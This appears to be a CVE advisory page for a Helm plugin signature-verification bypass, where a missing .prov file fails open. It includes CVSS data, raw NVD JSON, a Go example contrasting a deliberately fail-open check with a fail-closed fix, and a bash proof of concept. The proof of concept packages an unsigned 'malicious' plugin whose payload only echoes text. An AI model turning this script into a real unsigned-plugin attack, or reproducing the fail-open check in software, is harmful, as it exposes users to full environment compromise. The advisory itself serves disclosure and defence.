Security Vulnerability Report
CVE-2026-35205 CVSS 7.8 HIGH

Published: 2026-04-09 16:16:28
Last Modified: 2026-04-17 14:05:56

Description

Helm is a package manager for Kubernetes charts. In versions 4.0.0 through 4.1.3, helm plugin install will install a plugin whose provenance (.prov) file is missing even when signature verification is required: the absent signature is not treated as a verification failure, so the check fails open (CWE-636, Not Failing Securely). A user who relies on verification to reject unsigned plugins can therefore be induced to install an unsigned, attacker-supplied plugin; because Helm plugins are executables that run with the invoking user's privileges, the impact is full compromise of that user's environment (C:H/I:H/A:H). Exploitation requires the user to run the install against an attacker-controlled archive, which is why the vector is rated Local with User Interaction Required. This vulnerability is fixed in 4.1.4.
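The Go program below is an added illustration of the fail-open check described above; it is not Helm's own code or the upstream patch. It contrasts a model of the 4.0.0 through 4.1.3 behaviour (a missing .prov file is noticed but the install proceeds) with a fail-closed check (any verification problem, including an absent .prov file, aborts the install). Two assumptions are made: the sidecar is named <archive>.prov, following the naming Helm documents for chart provenance files, and checkProvenance only confirms that the file exists and is a PGP clearsigned message, standing in for real signature verification against a keyring.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrMissingProvenance is returned when verification was requested but no
// provenance file accompanies the plugin archive.
var ErrMissingProvenance = errors.New("plugin provenance (.prov) file is missing but verification is required")

// ErrMalformedProvenance is returned when the sidecar exists but does not look
// like a PGP clearsigned message, which is what a Helm .prov file contains.
var ErrMalformedProvenance = errors.New("plugin provenance file is not a PGP clearsigned message")

// provenancePath returns the sidecar path for an archive. Assumption: the
// "<archive>.prov" naming Helm documents for chart provenance files.
func provenancePath(archive string) string {
	return archive + ".prov"
}

// checkProvenance is a stand-in for the signature check. It only confirms that
// a .prov file exists and is a clearsigned message; a real implementation
// would also verify the PGP signature against a trusted keyring.
func checkProvenance(archive string) error {
	data, err := os.ReadFile(provenancePath(archive))
	if errors.Is(err, os.ErrNotExist) {
		return ErrMissingProvenance
	}
	if err != nil {
		return err
	}
	if !strings.HasPrefix(strings.TrimSpace(string(data)), "-----BEGIN PGP SIGNED MESSAGE-----") {
		return ErrMalformedProvenance
	}
	return nil
}

// installFailOpen models the behaviour described for Helm 4.0.0 through 4.1.3:
// a missing .prov file is not treated as a verification failure, so the plugin
// is installed even though the caller asked for verification. The first return
// value is true when the plugin would be installed.
func installFailOpen(archive string, verify bool) (bool, error) {
	if verify {
		if err := checkProvenance(archive); errors.Is(err, ErrMissingProvenance) {
			// The defect: warn and carry on instead of refusing.
			fmt.Fprintf(os.Stderr, "warning: %v (continuing)\n", err)
		} else if err != nil {
			return false, err
		}
	}
	return true, nil
}

// installFailClosed is the hardened form: any verification problem, including
// an absent .prov file, aborts the install.
func installFailClosed(archive string, verify bool) (bool, error) {
	if verify {
		if err := checkProvenance(archive); err != nil {
			return false, err
		}
	}
	return true, nil
}

func main() {
	// Constructed scenario: an unsigned archive with no sidecar .prov file.
	dir, err := os.MkdirTemp("", "helm-prov-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	archive := filepath.Join(dir, "poc-plugin-1.0.0.tgz")
	if err := os.WriteFile(archive, []byte("not a real plugin archive"), 0o644); err != nil {
		panic(err)
	}

	ok, err := installFailOpen(archive, true)
	fmt.Printf("fail-open   (4.0.0-4.1.3 behaviour): installed=%v err=%v\n", ok, err)
	ok, err = installFailClosed(archive, true)
	fmt.Printf("fail-closed (fixed behaviour):        installed=%v err=%v\n", ok, err)
}
```

The design point is that "no signature" and "bad signature" must be the same outcome when the caller asked for verification; only an explicit opt-out (verify=false) should skip the check, and that opt-out should be the user's choice rather than a side effect of a missing file.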

CVSS Details

CVSS v3.1 Score (Primary)
7.8
Severity
HIGH
CVSS v3.1 Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4.0 Score (Secondary)
8.4
Severity
HIGH
CVSS v4.0 Base Vector (threat, environmental and supplemental metrics not defined)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Weakness
CWE-636 (Not Failing Securely, 'Failing Open')

Configurations (Affected Products)

cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:* - VULNERABLE
Helm >= 4.0.0, <= 4.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35205: Helm Plugin Signature Verification Bypass
# Description: Demonstrates installing a plugin without a .prov file.
set -e

# 1. Create a malicious plugin directory
mkdir -p malicious-helm-plugin
cd malicious-helm-plugin

# 2. Create a minimal plugin.yaml
cat > plugin.yaml <<EOF
name: poc-plugin
version: "1.0.0"
usage: "Malicious plugin"
command: "echo 'System Compromised'"
EOF

# 3. Create a dummy executable
echo '#!/bin/sh' > install.sh
echo 'echo "Installing malicious payload..."' >> install.sh
chmod +x install.sh

# 4. Intentionally omit the .prov file (plugin-name-1.0.0.prov)
#    which is required for signature verification.

# 5. Package the plugin
tar czf ../malicious-helm-plugin.tar.gz .
echo "Plugin packaged without .prov file."
echo "On vulnerable versions, 'helm plugin install malicious-helm-plugin.tar.gz --verify' may succeed."

References

Patch: https://github.com/helm/helm/commit/05fa37973dc9e42b76e1d2883494c87174b6074f
Release notes: https://github.com/helm/helm/releases/tag/v4.1.4
Vendor advisory and mitigation: https://github.com/helm/helm/security/advisories/GHSA-q5jf-9vfq-h4h7
Helm provenance file documentation: https://helm.sh/docs/topics/provenance/#the-provenance-file

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35205", "sourceIdentifier": "[email protected]", "published": "2026-04-09T16:16:27.720", "lastModified": "2026-04-17T14:05:55.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Helm is a package manager for Charts for Kubernetes. From 4.0.0 to 4.1.3, Helm will install plugins missing provenance (.prov file) when signature verification is required. This vulnerability is fixed in 4.1.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-636"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.1.4", "matchCriteriaId": "800B9949-E36B-45F3-9EA0-CA9DDA3D8868"}]}]}], "references": [{"url": "https://github.com/helm/helm/commit/05fa37973dc9e42b76e1d2883494c87174b6074f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/helm/helm/releases/tag/v4.1.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/helm/helm/security/advisories/GHSA-q5jf-9vfq-h4h7", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}, {"url": "https://helm.sh/docs/topics/provenance/#the-provenance-file", "source": "[email protected]", "tags": ["Product"]}]}}